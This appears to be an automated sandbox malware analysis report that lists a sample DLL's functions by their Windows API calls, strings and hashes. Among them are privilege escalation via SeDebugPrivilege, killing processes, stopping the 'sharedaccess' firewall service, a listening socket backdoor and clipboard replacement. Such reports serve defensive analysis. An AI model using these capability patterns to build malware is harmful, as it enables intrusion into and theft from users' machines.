                                                            • Part of subcall function 1002C6A0: GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 1002C6DD
                                                            • Part of subcall function 1002C6A0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 1002C6E8
                                                            • Part of subcall function 1002C6A0: GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 1002C6F4
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000ED2D
                                                          • Process32First.KERNEL32(00000000,00000128), ref: 1000ED4F
                                                          • _strcmpi.MSVCRT ref: 1000ED70
                                                          • OpenProcess.KERNEL32(00000001,00000000,?,00000002,00000000), ref: 1000ED81
                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 1000ED8A
                                                          • Process32Next.KERNEL32(00000000,?), ref: 1000ED92
                                                          • CloseHandle.KERNEL32(00000000,00000000,?,00000002,00000000), ref: 1000ED9C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$LibraryLoadProcessProcess32$CloseCreateFirstHandleNextOpenSnapshotTerminateToolhelp32_strcmpi
                                                          • String ID: SeDebugPrivilege$explorer.exe
                                                          • API String ID: 3814622859-2721386251
                                                          • Opcode ID: 9745fbd0434098cbd2d8b7dbb2f7fa8ad6dc817a89ea0a6b86a541c905211a0a
                                                          • Instruction ID: 17e0e04e845da399990fac659a5be735f6de37b5642c8976c51b599fa26cdcf9
                                                          • Opcode Fuzzy Hash: 9745fbd0434098cbd2d8b7dbb2f7fa8ad6dc817a89ea0a6b86a541c905211a0a
                                                          • Instruction Fuzzy Hash: 9611D6B66003497BF310EBB0AC46FE7779CEB84381F440926FF05A2181EA65FD1846B2
                                                          Function 10023A10 Relevance: 15.1, APIs: 10, Instructions: 81networksleepthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WSAStartup.WS2_32(00000202,?), ref: 10023A21
                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 10023A35
                                                          • htons.WS2_32 ref: 10023A68
                                                          • bind.WS2_32 ref: 10023A83
                                                          • listen.WS2_32(00000000,00000032), ref: 10023A94
                                                          • accept.WS2_32(00000000,00000000,00000000), ref: 10023ABD
                                                          • malloc.MSVCRT ref: 10023AC3
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00023710,00000000,00000000,?), ref: 10023ADF
                                                          • Sleep.KERNEL32(000003E8), ref: 10023AEE
                                                          • CloseHandle.KERNEL32(00000000), ref: 10023AF7
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateHandleSleepStartupThreadacceptbindhtonslistenmallocsocket
                                                          • String ID:
                                                          • API String ID: 1905318980-0
                                                          • Opcode ID: 6aad2d46c7c87ead6b1222c858f8ef9459774bff7ca3c081f511d59da73b22f3
                                                          • Instruction ID: 28454ae119833d2f4dc16d51d0059342e59e328b12dcd3a5c90a667a38171ed6
                                                          • Opcode Fuzzy Hash: 6aad2d46c7c87ead6b1222c858f8ef9459774bff7ca3c081f511d59da73b22f3
                                                          • Instruction Fuzzy Hash: BE21D6346483116BF310DF68EC8ABAB77A8FF84750F404628F698D62E0E7B199048627
                                                          Function 100026B0 Relevance: 15.1, APIs: 10, Instructions: 71clipboardmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenClipboard.USER32(00000000), ref: 100026B3
                                                          • GetClipboardData.USER32(00000001), ref: 100026C7
                                                          • GlobalLock.KERNEL32(00000000), ref: 100026D8
                                                          • EmptyClipboard.USER32 ref: 100026F2
                                                          • GlobalAlloc.KERNEL32(00000002), ref: 1000270A
                                                          • GlobalLock.KERNEL32(00000000), ref: 10002717
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 1000273B
                                                          • SetClipboardData.USER32(00000001,00000000), ref: 10002744
                                                          • GlobalUnlock.KERNEL32(?), ref: 1000274F
                                                          • CloseClipboard.USER32 ref: 10002755
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyOpen
                                                          • String ID:
                                                          • API String ID: 3065066218-0
                                                          • Opcode ID: 2862ed5687d03e5c65a8664783a7ab9890a1c27da8607513131cd222ce1fbffd
                                                          • Instruction ID: eef061908f3c3295b15891c3fed615895cfe21d81dbfaa5e572b4fb253c06cc9
                                                          • Opcode Fuzzy Hash: 2862ed5687d03e5c65a8664783a7ab9890a1c27da8607513131cd222ce1fbffd
                                                          • Instruction Fuzzy Hash: 1F1194392406255FF3189B758C9DA6B7BD8FB846A2F19032DF61AC32E0DFA0DC008660
                                                          Function 10026980 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42serviceCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                            • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 1002699D
                                                          • OpenServiceA.ADVAPI32(00000000,sharedaccess,000F01FF), ref: 100269B0
                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 100269BE
                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,10024718), ref: 100269D3
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,10024718), ref: 100269E0
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,10024718), ref: 100269E3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$Open$CloseHandleProcess$ControlCurrentManagerQueryStatusToken
                                                          • String ID: SeDebugPrivilege$sharedaccess
                                                          • API String ID: 3393504433-1846105483
                                                          • Opcode ID: e6682fc845112422c817af6fc84500fcc42e45783356eb9191f629a16cf909fd
                                                          • Instruction ID: 15e74d9ebd8c7f86553c6ce66e6eb84fb0c1eec04d1206a1703c2b0d94a4763a
                                                          • Opcode Fuzzy Hash: e6682fc845112422c817af6fc84500fcc42e45783356eb9191f629a16cf909fd
                                                          • Instruction Fuzzy Hash: EEF0F639650224BBE210BB148C8AFFB3E68FF95791F44011AF608A9191EBB45844CAB2
                                                          Function 10017BB0 Relevance: 12.0, APIs: 8, Instructions: 38clipboardmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenClipboard.USER32(00000000), ref: 10017BB2
                                                          • EmptyClipboard.USER32 ref: 10017BBE
                                                          • GlobalAlloc.KERNEL32(00002000,?,?,?), ref: 10017BCE
                                                          • GlobalLock.KERNEL32(00000000), ref: 10017BDC
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 10017BF9
                                                          • SetClipboardData.USER32(00000001,00000000), ref: 10017C02
                                                          • GlobalFree.KERNEL32(00000000), ref: 10017C09
                                                          • CloseClipboard.USER32 ref: 10017C10
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyFreeLockOpenUnlock
                                                          • String ID:
                                                          • API String ID: 453615576-0
                                                          • Opcode ID: b4994271ed0c5f6ad7c9827fe64acb0f777f19826ff97a28270b989e17eee570
                                                          • Instruction ID: db7201b96ab1820305f6fb52e99ee6ce304ff54deb9d779612551a26aa299f3d
                                                          • Opcode Fuzzy Hash: b4994271ed0c5f6ad7c9827fe64acb0f777f19826ff97a28270b989e17eee570
                                                          • Instruction Fuzzy Hash: 61F036752016219FE7146B604CCCBEF36A8FB48752B490519F90AD6251CB649940C7B1
                                                          Function 100025B0 Relevance: 10.6, APIs: 7, Instructions: 60clipboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenClipboard.USER32(00000000), ref: 100025B8
                                                          • GetClipboardData.USER32(00000001), ref: 100025C6
                                                          • GlobalLock.KERNEL32(00000000), ref: 100025CF
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 10002609
                                                          • CloseClipboard.USER32 ref: 1000260F
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 10002632
                                                          • CloseClipboard.USER32 ref: 10002638
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Clipboard$Global$CloseUnlock$DataLockOpen
                                                          • String ID:
                                                          • API String ID: 2537359085-0
                                                          • Opcode ID: 80ece2687852f306fd33edd9e14cf1056a4f7933bde801836cb5a50ead5f4239
                                                          • Instruction ID: fa833299b88c5f4a584283747ecb7ea9d0db2f1ad11210ff9961461b47ce4595
                                                          • Opcode Fuzzy Hash: 80ece2687852f306fd33edd9e14cf1056a4f7933bde801836cb5a50ead5f4239
                                                          • Instruction Fuzzy Hash: 0001B5792106145BF3089B358C8DAAB3B98FBC0321F18072AF91B961E1EFE5ED048664
                                                          Function 1001B690 Relevance: 10.5, APIs: 7, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 1001B6D2
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6EA
                                                          • GetLastError.KERNEL32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6F0
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,00000010,00000000,00000000), ref: 1001B6FF
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                          • String ID:
                                                          • API String ID: 3398352648-0
                                                          • Opcode ID: 4016afdebf76fc38c603403ce2775b0087815ffa4e94011ab6c2084e23305a80
                                                          • Instruction ID: 9ea1a39ba13499be5e37f09f5477951cbb04746b7bbf0bdf0a23c0e989a9349b
                                                          • Opcode Fuzzy Hash: 4016afdebf76fc38c603403ce2775b0087815ffa4e94011ab6c2084e23305a80
                                                          • Instruction Fuzzy Hash: AA0144B9654300ABE304EF74CC89FAB77A4FB84700F88891CF64A86290D675D4448B61
                                                          Function 1007FAF0 Relevance: 9.8, Strings: 7, Instructions: 1084COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • *** BFRAME (flush) bf: head=%i tail=%i queue: head=%i tail=%i size=%i, xrefs: 10080402
                                                          • *** FINISH bf: head=%i tail=%i queue: head=%i tail=%i size=%i, xrefs: 100806E0
                                                          • IVOP, xrefs: 100802F0
                                                          • *** IFRAME bf: head=%i tail=%i queue: head=%i tail=%i size=%i, xrefs: 100802CC
                                                          • PVOP, xrefs: 1008022C
                                                          • *** EMPTY bf: head=%i tail=%i queue: head=%i tail=%i size=%i, xrefs: 100804BE
                                                          • *** END, xrefs: 1008083B
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: *** BFRAME (flush) bf: head=%i tail=%i queue: head=%i tail=%i size=%i$*** EMPTY bf: head=%i tail=%i queue: head=%i tail=%i size=%i$*** END$*** FINISH bf: head=%i tail=%i queue: head=%i tail=%i size=%i$*** IFRAME bf: head=%i tail=%i queue: head=%i tail=%i size=%i$IVOP$PVOP
                                                          • API String ID: 0-2740609450
                                                          • Opcode ID: 59cae3bf1122f43cd0cd32d226ccac3b0ecc167948723bb549a9c5797abe5bd6
                                                          • Instruction ID: 552bda2c2a28fec5ad751e390478c72a3e76191201ba06dd6fcbd107c7d5512c
                                                          • Opcode Fuzzy Hash: 59cae3bf1122f43cd0cd32d226ccac3b0ecc167948723bb549a9c5797abe5bd6
                                                          • Instruction Fuzzy Hash: CAA226B5A042889FDB68CF18C881BEA77E5FF89344F10861DFD898B351D774AA41CB91
                                                          Function 100290C0 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000028), ref: 100290D0
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 100290D7
                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10029105
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000010,00000000,00000000), ref: 1002911D
                                                          • GetLastError.KERNEL32 ref: 10029123
                                                          • CloseHandle.KERNEL32(?), ref: 10029134
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                          • String ID:
                                                          • API String ID: 3398352648-0
                                                          • Opcode ID: 149c958cf4e409a043c1ff8710811fbd874f2c7f626f077d67b57da5f78a4f18
                                                          • Instruction ID: 4db5a6e2c7b4cb126f103a4b1f94b4cfd3d626149b56619aedb11a4ed5bc1c08
                                                          • Opcode Fuzzy Hash: 149c958cf4e409a043c1ff8710811fbd874f2c7f626f077d67b57da5f78a4f18
                                                          • Instruction Fuzzy Hash: F4018879654310AFE304EB78CC89F9B77A8FB84B00F448A1DF68D96290D775D8048761
                                                          Function 1001A100 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CoInitialize.OLE32(00000000), ref: 1001A107
                                                          • CoCreateInstance.OLE32(100EACE0,00000000,00000001,100EACC0,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1001A11F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateInitializeInstance
                                                          • String ID: FriendlyName
                                                          • API String ID: 3519745914-3623505368
                                                          • Opcode ID: 61e8a9f583257a81a27f2bd397121991c8e277aade336a3bff62ca7ac66e2cb8
                                                          • Instruction ID: cecdfafdaea8945f0d6e05b015b6355bace826cc94fa0b1d175a53f4daf6acc8
                                                          • Opcode Fuzzy Hash: 61e8a9f583257a81a27f2bd397121991c8e277aade336a3bff62ca7ac66e2cb8
                                                          • Instruction Fuzzy Hash: F7310574244202AFD604CF65CC88F5BB7E9FF89614F148958F549DB250DB74E88A8B62
                                                          Function 10009C40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(?,?,?,?,00000000), ref: 10009C85
                                                          • FindClose.KERNEL32(00000000), ref: 10009D07
                                                          • CloseHandle.KERNEL32(?), ref: 10009D19
                                                          • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 10009D31
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseFileFind$CreateFirstHandle
                                                          • String ID: p
                                                          • API String ID: 3283578348-2181537457
                                                          • Opcode ID: 5ca221129d8a3a18f25eb801b6ab58ffdf62e839a6ab82df66ebab739c56a846
                                                          • Instruction ID: 2b1597b52ddb8eafb0e91e12b29208ebd2643c3ea00a9cd01ad1c39fb074611e
                                                          • Opcode Fuzzy Hash: 5ca221129d8a3a18f25eb801b6ab58ffdf62e839a6ab82df66ebab739c56a846
                                                          • Instruction Fuzzy Hash: 7631BC719087019BF324DF28CC45B8FB6D6EBC53A0F25461EF1AA873D4D634D4458B41
                                                          Function 10023650 Relevance: 6.1, APIs: 4, Instructions: 55networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
